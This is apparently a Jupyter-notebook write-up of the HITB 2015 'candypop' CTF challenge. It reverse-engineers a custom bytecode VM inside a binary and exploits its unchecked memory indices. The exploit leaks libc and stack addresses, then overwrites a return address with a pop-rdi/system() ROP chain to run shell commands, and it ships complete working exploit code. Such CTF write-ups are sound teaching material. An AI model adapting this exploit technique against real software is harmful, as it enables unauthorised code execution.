## Introduction

This is a write-up of the pwn1000 challenge (candypop) of the HITB 2015 Teaser CTF. Here's the original description of the challenge:

> We got backdoor access to an old candy vending machine, however we havent
> been able to escalate privileges to the underlying operating system yet. The
> candy machine is said to be using a strange obscure and minimal architecture.
> Can you help us get access? We need to get ahold of the copious amounts of
> KitKat & Snickers A.S.A.P.

> We conveniently made the backdoor accessible over TCP/IP, it can be reached at
> 52.16.33.218:22226. Furthermore, we managed to bribe an old employee of the
> manufacturer (that is now defunct) of the vending machine to send us a copy of
> a binary.. but we can't make heads or tails out of it. HELP!

Download the binary: [candypop](candypop). TL;DR: download the [exploit](candypwn.py).

Let's start by defining a way to connect to the candy machine.

In [1]:
def connection_factory():
    # Connect to the candy machine (no longer available)
    # return Flow.connect_tcp('52.16.33.218', 22226)

    # If you want to use the local executable, use:
    return Flow.execute('./candypop')

    # Or, via ssh (I've got a virtual machine set up for this):
    #return Flow.execute_ssh('./candypop', '127.0.0.1', 2224)

Let's see what kind of treat we got!

In [2]:
%checksec candypop

RELRO    CANARY  NX   PIE  RPATH  RUNPATH  FORTIFIED  PATH
Partial  Yes     Yes  Yes  No     No           0/4/4  candypop


In [3]:
f = connection_factory()
f.writeline(b'hello world')
print(f.read_eof())

Herro.
INPUT PROGRAM:
READ 12 BYTEZ..



So probably a virtual machine, interpreter or sandbox with ASLR enabled, a non-executable stack and stack canaries in place. We know nothing about what kind of program it accepts though.

Let's see if we can identify the remote system:

In [4]:
!strings candypop|grep GCC

GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2


Google shows us this GCC version is used on Ubuntu Trusty Tahr. So fire up a VM that runs that, we'll continue from inside the VM.

## Disassembly

Let's have a look at the disassembly. The program is stripped, so have a look at the entrypoint to discover the address of the main function, it's 0x1235. Looking at that function you'll notice the following things:

- It sets up 0x4030 bytes of stack space.
- It outputs the banner.
- Reads up to 0x4000 bytes from stdin to rbp-0x4010 and stores how many bytes were read to rbp-0x4014.
- It outputs how many bytes were read.
- If it didn't read anything, it'll print an error.
- If it did read something, it calls 0x10f5 providing two arguments: the buffer and the program length.
- Either way it prints '** DONE' and returns.

The function at 0x10f5 prepares a buffer, initialises it and calls another function:

- It sets up 0x4030 bytes of stack space.
- It stores the pointer to the program at rbp-0x4028 and the length at rbp-0x402c.
- It calls a function at 0xac5 with rbp-0x4020 as argument.
- It copies the program from the provider buffer to rbp-0x4020.
- It calls a function at 0xb32 with rbp-0x4020 as only argument.

The function at 0xac5 initialises the provided buffer:

- It sets the first 9 shorts at offset 0x4000 to 0 (the first 7 in a loop, the last 2 explicitly).
- It sets the first 0x4000 to 0 using memset.

So the structure of this buffer is probably something like:

    struct {
        char a[4000];
        short b[7];
        short c;
        short d;
    }

Now we get to the really interesting part. The function at 0xb32 seems to be the main interpreter:

- It stores the pointer to the buffer.a member to rbp-0x10.
- It stores the pointer to the buffer.b member to rbp-0x08.
- It loops while buffer.d > 0 increasing d by 1 and buffer.c by 4 each iteration.
- Each iteration loads the byte at buffer.a[buffer.c + 1] into rbp-0x18 and a short encoded in big endian at buffer.b[buffer.c + {2,3}] into rbp-0x14.
- It then performs a switch on buffer.b[buffer.c] and executes some instruction based on that.

Okay, so now we can say something about the interpreter. It's a virtual machine where each operation consists of an opcode, an 8 bit argument and a 16 bit argument. Buffer.c is the program counter, buffer.d keeps track of how many instruction have been executed. Looking at the disassembly of the actual opcodes, the buffer.b seems to be the memory of the virtual machine.

That buffer, is not just a buffer but describes the virtual machine state:

    typedef struct {
        unsigned char opcode;
        unsigned char arg1;
        unsigned short arg2;  // not really a short as it's big endian.
    } opcode;

    struct {
        opcode opcodes[1000];
        short mem[7];
        short pc;  // program counter
        short ic;  // executed instructions counter
    }

After closer analysis, the individual opcodes map out like this:

    opcode | function
    -------|------------------------------
    0x10   | mem[arg1] = arg2
    0x11   | mem[arg1] = mem[arg2]
    0x12   | mem[arg1] ^= arg2
    0x30   | mem[arg1] <<= arg2
    0x31   | mem[arg1] >>= arg2
    0x40   | mem[arg1] += arg2
    0x41   | mem[arg1] += mem[arg2]
    0x49   | mem[arg1] |= arg2
    0x50   | mem[arg1] &= arg2
    0x51   | mem[arg1] &= & mem[arg2]
    0x60   | flag = mem[arg1] == arg2
    0x61   | flag = mem[arg1] == mem[arg2]
    0xa5   | printf("%04x\n", mem[arg1])
    0xa6   | putchar(0x0a)
    0xbb   | if(flag == 1) jump arg2
    0xbc   | jump arg2
    0xc0   | exit(-1)
    0xde   | return 0
    0xfe   | read(program + 0x3f00, 0x100)

Now, with all functionality mapped, what can we do to break it?

## Exploitation

When accessing the memory, arg1 and arg2 aren't bounds checked so let's see if we can see anything interesting from the stack. We create a program for the interpreter that leaks everything from mem[10] to mem[255] and then calls the 0xfe opcode (which we can easily catch in gdb by catching the read syscall).

Firstly, lets create a function that can pack a series of candy machine commands.

In [5]:
# Function to pack a series of candypop VM commands
def build(c):
    return pack('>' + 'BBH' * (len(c) // 3), *c)

Now, let's see what kind of data we can leak by writing a pre-compiled program to disk.

In [6]:
# Create the program that leaks the memory.
program = []
for i in range(10, 256):
    program.extend([
        0xa5, i, 0,
    ])

# Change True to False to connect to the candy machine directly instead of dropping a pre-compiled program.
if True:
    # Our pre-compiled program also issues the read instruction.
    program.extend([0xfe, 0, 0])
    with open('candyflood', 'wb') as f:
        f.write(build(program))
else:
    f = connection_factory()
    f.until(b'INPUT PROGRAM:\n')
    f.write(build(program))

    # Read the output.
    f.read_eof(echo=True)

Feeding that to the remote service using netcat (nc 52.16.33.218 22226 < candyflood) shows something along the lines of:

    Herro.
    INPUT PROGRAM:
    READ 92 BYTEZ..
    7fff
    0000
    2f52
    f7a8
    7fff
    0000
    e440
    ffff
    7fff
    0000
    52fa
    5555
    5555
    0000
    e528
    ffff
    7fff
    0000
    0000
    0000
    0001
    0000
    ...

This example is actually the output from a gdb session and not the remote server, but that doesn't really matter. The lines 4 and 5 are part of an address but the address is incomplete, lines 6-9, 10-13 and 14-17 make up addresses. If you run it a second time, you'll notice the addresses have changed. ASLR is enabled.

Let's run it in gdb and see what we find. We catch syscall read before we run the program and keep continuing until we're returned to gdb after the memory has been dumped.

Use info proc mappings to discover which section holds the first address (0x00007ffff7a82f52). It's in libc.so, at an offset of 0x6df52 from the beginning of the mapped region. We can use this to calculate the address of the system() function.

The second address (0x00007fffffffe440) is a stack address, it's actually the stored frame pointer of the main function. Since we caught the read syscall, we have the address of the secondary read buffer (buffer.opcodes + 0x3f00) in the rsi register. The offset between the leaked address and the read buffer is 0x4160 bytes.

The third address (0x00005555555552fa) is the return address for the function at 0x10f5 and points to inside the main function.

Now we have everything we need to craft a solution: a way to leak a pointer to the stack and to libc, an overwritable return pointer and a way to run a second program which can exploit those conditions after leaking the addresses.

## Solution

After collecting all the data, I used pwnypack to write a script that leaks the libc and stack address, calculates the base addresses of libc and the second phase read buffer. It then locates a pop rdi; ret gadget inside libc, looks up the address of the system() call and sets up the ROP chain for a command provided on the commandline.

Let's set up the base environment and get the required information from the binaries:

In [7]:
# Assume the target of the candypop binary.
target.assume(ELF('candypop'))

# Load libc.so from ubuntu trusty tahr. Note: the libc.so version was deduced
# from the gcc signature in the candypop binary.
libc = ELF('candypop-libc.so')

# Get the offset of the system call within libc.
SYSTEM_ADDR = libc.get_symbol('system').value

# Find the offset of a suitable gadget.
GADGET_ADDR = find_gadget(libc, asm('pop rdi\nret'))[0]['addr']

Next, we define a helper function to pack machine code ops for the candy machine.

Our stage 1 program tells the candy machine to print an element to get the stack prepared. Then we leak the libc address and the stack address. After that we'll tell the machine to load our stage 2 program.

In [8]:
# Stage 1: leak addresses, initiate read.
def build_stage1():
    return build([
        # Write something to get required addresses on stack.
        0xa5, 0, 0,

        # Leak address inside libc.
        0xa5, 15, 0,
        0xa5, 14, 0,
        0xa5, 13, 0,
        0xa5, 12, 0,

        # Leak stack address.
        0xa5, 19, 0,
        0xa5, 18, 0,
        0xa5, 17, 0,
        0xa5, 16, 0,

        # Tell candy machine to read more data.
        0xfe, 0,  0,
    ])

We then create a function that takes the tuples of the leaked addresses and turns them into the relevant base addresses.

In [9]:
# Parse a sequence of address parts to an address.
def parse_addr(c):
    return int(b''.join(c), 16)

# Parse leaked addresses, rebase to libc base and read buffer addresses.
def parse_addrs(data):
    libc_base = parse_addr(data[0:4]) - 0x6df52
    read_buffer = parse_addr(data[4:9]) - 0x4160
    return libc_base, read_buffer

Our stage 2 function takes the libc base address and the address of the read buffer and sets up a ROP chain. The chain will start with the pop rdi; ret gadget, which pops the address of the argument to the system call into rdi and then returns to the libc system() function.

In [10]:
def build_stage2(libc_base, read_buffer):
    gadget_addr = libc_base + GADGET_ADDR
    system_addr = libc_base + SYSTEM_ADDR
    system_arg = read_buffer + 52  # 52 = length of secondary program: 13 ops * 4 bytes.
    return build([
        # Write address of gadget (pop rdi; ret) to RP.
        0x10, 23, (gadget_addr >> 48) & 0xffff,
        0x10, 22, (gadget_addr >> 32) & 0xffff,
        0x10, 21, (gadget_addr >> 16) & 0xffff,
        0x10, 20, (gadget_addr >>  0) & 0xffff,

        # Write address of argument to system to RP+8.
        0x10, 27, (system_arg >> 48) & 0xffff,
        0x10, 26, (system_arg >> 32) & 0xffff,
        0x10, 25, (system_arg >> 16) & 0xffff,
        0x10, 24, (system_arg >>  0) & 0xffff,

        # Write address of system() to RP+16.
        0x10, 31, (system_addr >> 48) & 0xffff,
        0x10, 30, (system_addr >> 32) & 0xffff,
        0x10, 29, (system_addr >> 16) & 0xffff,
        0x10, 28, (system_addr >>  0) & 0xffff,

        # Return.
        0xde, 0, 0,
    ])

All we need now is a function that connects to the candy machine, and implements some flow control:

In [11]:
def candypop(system_cmd):
    # Connect to the candy machine.
    f = connection_factory()

    # Consume initial output.
    f.until(b'INPUT PROGRAM:\n')

    # Phase 1, leak addresses, initiate read.
    f.write(build_stage1(), echo=False)
    # Consume uninteresting output.
    f.until(b'0000\n')
    
    # Get the interesting bits.
    data = [l.strip() for l in f.readlines(8)]

    # Parse output and calculate relevant base addresses.
    libc_base, read_buffer = parse_addrs(data)

    # Send the secondary program.
    f.write(build_stage2(libc_base, read_buffer) + system_cmd, echo=False)

    f.read_eof(echo=True)

Now, we can use this function to execute commands on the remote system:

In [12]:
candypop(b'ls')

candyflood
candyflood.py
candypop
candypop.ipynb
candypop-libc.so
candypwn.py
YOU_WANT_THIS


In [13]:
candypop(b'cat YOU_WANT_THIS')

HITB{8b7b9241c9282e9a982378f73d648781}
